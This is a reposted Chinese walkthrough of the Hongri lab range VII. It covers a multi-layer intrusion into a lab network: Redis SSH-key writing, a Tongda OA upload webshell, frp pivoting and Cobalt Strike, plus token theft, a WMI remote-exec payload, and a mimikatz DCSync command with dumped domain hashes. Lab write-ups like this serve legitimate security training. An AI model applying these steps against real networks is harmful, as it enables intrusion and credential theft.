红日靶场(七)WHOAMI Penetration(一)

admin 2024年11月21日11:07:05评论33 views字数 1707阅读5分41秒阅读模式

红日靶场(七)WHOAMI Penetration(一)

·DMZ IP段为192.168.1.0/24

·二层网络 IP段为192.168.52.0/24

·三层网络 IP段为192.168.93.0/24

第一层网络  

首先我们拿到靶机的ip为192.168.1.128,我们直接可以fscan进行端口扫描,发现了一个redis授权漏洞和一个Laravel的cve漏洞    

红日靶场(七)WHOAMI Penetration(一)

我们直接通过redis未授权写ssh密钥,拿到主机的shell

红日靶场(七)WHOAMI Penetration(一)

红日靶场(七)WHOAMI Penetration(一)    

然后我们直接viper上新建监听,然后一句话上线viper

红日靶场(七)WHOAMI Penetration(一)

红日靶场(七)WHOAMI Penetration(一)

直接在靶机上运行就可以上线viper

红日靶场(七)WHOAMI Penetration(一)

红日靶场(七)WHOAMI Penetration(一)

第二层网络  

然后我们添加内网路由,查看主机的ip

红日靶场(七)WHOAMI Penetration(一)

发现存在内网192.168.52.0/24段的网络,我们上次fscan进行内网扫描,发现了一个通达oa    

红日靶场(七)WHOAMI Penetration(一)

我们先将通达的端口给转发到本地,然后进行访问

红日靶场(七)WHOAMI Penetration(一)

红日靶场(七)WHOAMI Penetration(一)

我们使用通达oa的工具进行测试发现一个文件上传的漏洞,我们直接传入🐎上线蚁剑    

红日靶场(七)WHOAMI Penetration(一)

红日靶场(七)WHOAMI Penetration(一)    

红日靶场(七)WHOAMI Penetration(一)

然后我们通过蚁剑上传我们viper的🐎,就可以上线了

红日靶场(七)WHOAMI Penetration(一)

红日靶场(七)WHOAMI Penetration(一)    

然后添加路由,但是我们发现上传的fscan没法运行,然后又是一台windows的系统,我们直接转cs上线,但是cs上线需要把我们的本地的端口转发到靶机里面,这样我们就可以监听到pc了,我们frp进行内网穿透,我们将第一台靶机设为我们的服务端,本地为客户端,这样就可以了

第一台靶机

红日靶场(七)WHOAMI Penetration(一)本地kali

红日靶场(七)WHOAMI Penetration(一)

发现可以连通

红日靶场(七)WHOAMI Penetration(一)    

我们可以进行测试,在本机监听8008端口,然后在靶机上去访问nc 127.0.0.1 8008,发现可以了红日靶场(七)WHOAMI Penetration(一)红日靶场(七)WHOAMI Penetration(一)

然后我们就可以开启cs的去监听8008端口,viper直接已将转cs,就可以上线cs了

红日靶场(七)WHOAMI Penetration(一)    

红日靶场(七)WHOAMI Penetration(一)

红日靶场(七)WHOAMI Penetration(一)

第三层网络  

上线cs后我们进行端口的扫描,我们发现93段的ip,我们直接进行探测,然后发现DC的ip是192.168.93.30,和pc2的ip

红日靶场(七)WHOAMI Penetration(一)

然后通过 shell ipconfig /displaydns 来查看域名    

红日靶场(七)WHOAMI Penetration(一)

然后我们查看进程,会发现有域管的进程,我们可以进行令牌的窃取

红日靶场(七)WHOAMI Penetration(一)    

红日靶场(七)WHOAMI Penetration(一)

然后我们进行通过域管的权限去运行我们的🐎就可以上线域管的监听了

remote-exec wmi 192.168.52.30 C:MYOAwebrootsh3.exe

红日靶场(七)WHOAMI Penetration(一)

然后我们尝试导出域内所有用户的hash值,发现可以导出,然后我们就可以用DCsync攻击就可以

[*] Tasked beacon to run mimikatz's lsadump::dcsync /domain:WHOAMIANONY.org /all /csv command            
[+] host called home, sent: 787057 bytes            
[+] received output:            
[DC] 'WHOAMIANONY.org' will be the domain            
[DC] 'DC.whoamianony.org' will be the DC server            
[DC] Exporting domain 'WHOAMIANONY.org'            
[rpc] Service: ldap            
[rpc] AuthnSvc : GSS_NEGOTIATE (9)            
502krbtgt6be58bfcc0a164af2408d1d3bd313c2a514            
1001whoamiab89b1295e69d353dd7614c7a3a80cec66048            
1115moretzba6723567ac2ca8993b098224ac27d9066048            
1002DC$202d13c79f52cc1d49870638e854afad532480            
1112bunnycc567d5556030b7356ee4915ff098c8f66048            
500Administratorab89b1295e69d353dd7614c7a3a80cec66048            
1113PC2$65e034039585f728c8f15fe3f3b814ed4096            
   

然后我们进行上🐎,直接上线dc,同样操作上线pc2

红日靶场(七)WHOAMI Penetration(一)

红日靶场(七)WHOAMI Penetration(一)    

原文始发于微信公众号(Undefin3d安全团队):红日靶场(七)WHOAMI Penetration(一)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月21日11:07:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   红日靶场(七)WHOAMI Penetration(一)https://cn-sec.com/archives/3408082.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息